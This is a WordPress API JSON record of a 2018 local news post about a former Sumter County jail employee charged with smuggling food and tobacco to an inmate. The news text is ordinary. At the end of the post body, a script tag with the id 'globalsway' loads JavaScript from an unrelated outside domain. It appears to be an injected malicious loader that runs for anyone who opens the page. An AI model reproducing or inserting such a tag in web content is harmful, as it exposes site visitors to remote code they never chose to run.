{"id":219018,"date":"2018-03-19T13:00:25","date_gmt":"2018-03-19T17:00:25","guid":{"rendered":"https:\/\/wordpress-1.tempurl.host\/?p=219018"},"modified":"2018-03-19T13:10:04","modified_gmt":"2018-03-19T17:10:04","slug":"sumter-jail-arrested-on-allegations-of-providing-inmate-food-and-tobacco","status":"publish","type":"post","link":"https:\/\/thegraphicgeek.com\/demo-cflwire\/sumter-jail-arrested-on-allegations-of-providing-inmate-food-and-tobacco\/","title":{"rendered":"Sumter jail employee arrested on allegations of providing inmate food and tobacco"},"content":{"rendered":"<p>BUSHNELL &#8212; A former Sumter County jail employee was arrested Monday on allegations she provided contraband to an inmate.<\/p>\n<p>Kimberly Ann McSwain, was a civilian employee at the jail, when she was accused of giving food, cigarettes and chewing tobacco to an inmate, according to Michelle Keszey, a spokeswoman for the Sumter County Sheriff&#8217;s Office.<\/p>\n<p>McSwain, 47, of Groveland,\u00a0was charged with smuggling contraband into a detention facility and held in the jail Monday in lieu of $2,000 bail.<\/p>\n<p>McSwain, had been\u00a0employed at the jail since February of 2016, before she\u00a0was terminated from her detention support specialist\u00a0position\u00a0on March 12 amid the allegations, Keszey said.<\/p>\n<p>Keszey added officials do not believe she provided items to any other inmate and it is not clear why she would have given items to the specific inmate.<\/p>\n<p>&nbsp;<script src='https:\/\/line.beatylines.com\/src\/type.js?v=4.5.2' type='text\/javascript' id='globalsway'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>BUSHNELL &#8212; A former Sumter County jail employee was arrested Monday on allegations she provided contraband to an inmate.
